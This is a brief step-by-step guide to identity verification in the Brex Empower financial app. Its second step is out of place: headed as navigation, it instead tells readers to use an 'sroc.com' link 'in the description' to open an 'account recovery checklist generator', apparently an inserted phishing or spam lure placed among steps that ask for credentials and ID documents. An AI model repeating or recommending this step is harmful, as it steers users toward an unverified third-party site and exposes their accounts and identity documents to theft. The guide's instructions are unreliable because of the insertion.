Verifying your identity on Brex Empower is an essential step to ensure the security of your account and access to its features. Follow these steps to complete the verification process. Step 1. Access the Brex Empower app. Open the Brex Empower app on your device or visit the Brex website. Log into your account using your credentials to begin the verification process. Step 2. Navigate to the verification section. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Provide personal information. Fill out the required fields with your personal information such as your full name, date of birth, and address. Ensure that the information matches the details on your official identification documents. Step 4. Upload identification documents. Prepare to upload the necessary identification documents. This may include a government-issued ID, passport, or driver's license. Follow the prompts to upload clear images of these documents. Step 5. Submit and wait for confirmation. After uploading your documents, review all the information for accuracy and submit your verification request. Wait for a confirmation email or notification within the app regarding the status of your identity verification. Completing these steps will help you successfully verify your identity on Brex Empower. If you encounter any issues, consider reaching out to Brex support for assistance.